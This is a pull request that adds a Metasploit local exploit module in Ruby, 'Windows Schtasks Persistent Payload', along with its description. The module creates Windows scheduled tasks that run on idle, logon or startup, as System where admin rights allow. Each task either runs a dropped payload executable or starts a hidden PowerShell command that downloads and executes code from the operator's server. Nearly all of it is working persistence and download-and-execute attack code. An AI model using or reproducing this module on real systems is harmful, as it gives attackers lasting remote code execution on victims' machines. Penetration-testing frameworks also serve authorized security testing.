### PR TITLE
Persistence with schtasks.

### DIFF
--- a/modules/exploits/windows/local/schtasks.rb
+++ b/modules/exploits/windows/local/schtasks.rb
@@ -1,0 +1,130 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+require 'msf/core/exploit/exe'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Post::File
+  include Post::Windows::Priv
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name'          => 'Windows Schtasks Persistent Payload',
+                      'Description'   => %q(
+          This Module will create a schtask that can either run once the user is idle,
+          or if the user is part of the admin group you can then create schtasks that can
+          work at boot or user login.  Windows checks a users idle time ever 15 minutes.),
+                      'License'       => MSF_LICENSE,
+                      'Author'        =>
+                       [
+                         'James Cook @b00stfr3ak44'
+                       ],
+                      'Platform'       => ['win'],
+                      'SessionTypes'   => ['meterpreter'],
+                      'Targets'        => [['Windows', {}]],
+                      'DefaultTarget'  => 0,
+                      'References'    => [
+                        ['URL', 'http://blog.cobaltstrike.com/2013/11/09/schtasks-persistence-with-powershell-one-liners/']
+                      ]
+                     ))
+
+    register_options(
+      [
+        OptString.new('DELAY', [false, 'Delay in minutesl for user idle time.', 30]),
+        OptString.new('TASKNAME', [false, 'The name to call payload on remote system.', nil]),
+        OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'PSH', %w(PSH EXE)]),
+        OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),
+        OptString.new('FILENAME', [false, 'File name on disk']),
+        OptEnum.new('TYPE', [true, 'Type of task to run.', 'IDLE', %w(LOGIN STARTUP IDLE)])
+      ], self.class)
+  end
+
+  def primer
+    taskname = datastore['TASKNAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
+    type = set_type
+    case datastore['TECHNIQUE']
+    when 'PSH'
+      url = get_uri
+      cmd = psh_command(taskname, url, type)
+    when 'EXE'
+      exe_location = upload_exe
+      cmd = %(schtasks /create /tn #{taskname} /tr )
+      cmd << %("#{exe_location}" /sc #{type})
+    end
+    print_good("Executing #{cmd}")
+    cmd_exec(cmd)
+  end
+
+  def upload_exe
+    payload_filename = datastore['FILENAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.exe'
+    payload_path = datastore['PATH'] || get_env('TEMP')
+    cmd_location = "#{payload_path}\\#{payload_filename}"
+    exe_payload = generate_payload_exe
+    print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
+    write_file(cmd_location, exe_payload)
+    cmd_location
+  end
+
+  def psh_command(taskname, url, type)
+    cmd = "schtasks /create /tn #{taskname} /tr "
+    download_and_run = %('IEX ((new-object net.webclient).downloadstring(''#{url}'''))'")
+    psh_cmd = generate_psh_command_line(
+      path: %("c:\\windows\\system32\\WindowsPowerShell\\v1.0\\),
+      noprofile: true,
+      windowstyle: 'hidden',
+      nologo: true,
+      noninteractive: true,
+      command: download_and_run
+    )
+    cmd << psh_cmd
+    type = " /sc #{type}"
+    cmd << type
+  end
+
+  def on_request_uri(cli, _request)
+    print_status('Delivering Payload')
+    data = cmd_psh_payload(payload.encoded,
+                           payload_instance.arch.first,
+                           remove_comspec: true,
+                           use_single_quotes: true
+                          )
+    send_response(cli, data,  'Content-Type' => 'application/octet-stream')
+  end
+
+  def set_type
+    case datastore['TYPE']
+    when 'LOGIN'
+      check_privs
+      'onlogon /ru System'
+    when 'STARTUP'
+      check_privs
+      'onstart /ru System'
+    when 'IDLE'
+      "onidle /i #{datastore['DELAY']}"
+    end
+  end
+
+  def check_privs
+    vprint_status('Checking admin status...')
+    admin_group = is_in_admin_group?
+    if admin_group.nil?
+      print_error('Either whoami is not there or failed to execute')
+      print_error('Continuing under assumption you already checked...')
+    else
+      if admin_group
+        print_good('Part of Administrators group! Continuing...')
+      else
+        fail_with(Exploit::Failure::NoAccess, 'Not in admins group, cannot create schtask')
+      end
+    end
+  end
+end


### PR DESCRIPTION
This Module will create a schtask that can either run once the user is idle,
or if the user is part of the admin group you can then create schtasks that
can work at boot or user login.  Windows checks a users idle time ever 15 minutes.
This should help keep persistence on a box as a normal user.
